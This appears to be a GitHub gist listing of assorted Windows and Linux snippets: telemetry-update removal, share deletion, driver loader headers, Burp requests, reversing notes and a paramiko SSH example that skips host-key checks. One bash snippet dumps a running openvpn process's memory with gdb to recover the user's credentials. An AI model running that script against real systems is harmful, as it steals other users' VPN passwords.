@maldevel
maldevel / remove_crw.cmd
Last active November 17, 2015 13:36 — forked from xvitaly/remove_crw.cmd
Remove telemetry updates for Windows 7 and 8.1
echo Uninstalling KB3075249 (telemetry for Win7/8.1)
start /w wusa.exe /uninstall /kb:3075249 /quiet /norestart
echo Uninstalling KB3080149 (telemetry for Win7/8.1)
start /w wusa.exe /uninstall /kb:3080149 /quiet /norestart
echo Uninstalling KB3021917 (telemetry for Win7)
start /w wusa.exe /uninstall /kb:3021917 /quiet /norestart
echo Uninstalling KB3022345 (telemetry)
start /w wusa.exe /uninstall /kb:3022345 /quiet /norestart
echo Uninstalling KB3068708 (telemetry)
start /w wusa.exe /uninstall /kb:3068708 /quiet /norestart
#!/bin/bash
# This little hack-job will grab credentials from a running openvpn process in Linux
# Keep in mind this won't work if the user used the --auth-nocache flag
grep rw-p /proc/$1/maps | sed -n 's/^\([0-9a-f]*\)-\([0-9a-f]*\) .*$/\1 \2/p' | while read start stop; do gdb --batch-silent --silent --pid $1 -ex "dump memory $1-$start-$stop.dump 0x$start 0x$stop"; done
echo "Your credentials should be listed below as username/password"
strings *.dump | grep -B2 KnOQ | grep -v KnOQ
rm *.dump --force
@maldevel
maldevel / delete_default_hidden_shared_folders.bat
Last active January 15, 2017 16:15
Delete All default hidden shared folders from Windows
@echo off
net share /delete C$ /y
net share /delete D$ /y
net share /delete E$ /y
net share /delete F$ /y
net share /delete G$ /y
net share /delete H$ /y
net share /delete I$ /y
net share /delete J$ /y
@maldevel
maldevel / DriverServiceInstaller.c
Last active January 15, 2017 16:15
Creates a service and starts it to load a driver into Windows kernel.
/*
ServiceInstaller - Creates a service and starts it to load a driver into Windows kernel.
Copyright (C) 2015 @maldevel
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
@maldevel
maldevel / DriverUninstallService.c
Last active January 15, 2017 16:15
Stops a service and removes it to unload a driver from Windows kernel.
/*
ServiceUninstaller - Stops a service and removes it to unload a driver from Windows kernel.
Copyright (C) 2015 @maldevel
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
@maldevel
maldevel / GetCoreInfo.cs
Last active January 16, 2016 06:31
Retrieve Processors Information
using System;
using System.Management;
namespace coreinfo
{
    class Program
    {
        static void Main(string[] args)
        {
            PrintCoreInfo();
@maldevel
maldevel / colorama.c
Last active August 10, 2016 13:58
Color text in Windows terminal application
/*
Copyright (C) 2016 @maldevel
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
@maldevel
maldevel / call_burp_requests.py
Last active September 16, 2016 20:14
Make Multiple Burp HTTP Requests
import requests
import os
proxies = {
    'http': 'http://127.0.0.1:8080',
    'https': 'http://127.0.0.1:8080',
}
protocol = 'https'
xsrf = 'xsrf-token'
@maldevel
maldevel / reversing_secrets_of_reverse_engineering.txt
Last active May 20, 2021 07:48
Notes # Reversing - Secrets of Reverse Engineering
## List All Functions containing GenericTable in their name from NTDLL.DLL
dumpbin /EXPORTS "C:\Windows\SysWOW64\ntdll.dll" | grep GenericTable | grep -E -v "Avl$|AvlEx$" | awk '{print $4}' > NTDLL_GenericTable_Methods.txt
## Print RVA (Relative Virtual Address)
dumpbin /EXPORTS "C:\Windows\SysWOW64\ntdll.dll" | grep GenericTable | grep -E -v "Avl$|AvlEx$" | awk '{print $3 " " $4}' > NTDLL_GenericTable_Methods.txt
## Find image base
dumpbin /HEADERS "C:\Windows\SysWOW64\ntdll.dll" | grep "image base"
@maldevel
maldevel / ssh.py
Last active October 16, 2016 09:13
Perform commands over ssh with Python
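import paramiko

ssh = paramiko.SSHClient()
# AutoAddPolicy accepts any unknown host key without verification; where the
# host key is known in advance, load it and use paramiko.RejectPolicy() instead.
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect('example.com', username='username', password='password')
# Run a single command and print its non-empty output lines
stdin, stdout, stderr = ssh.exec_command('ls')
lines = stdout.readlines()
for line in lines:
    if line.strip():
        print(line.rstrip('\n'))
ssh.close()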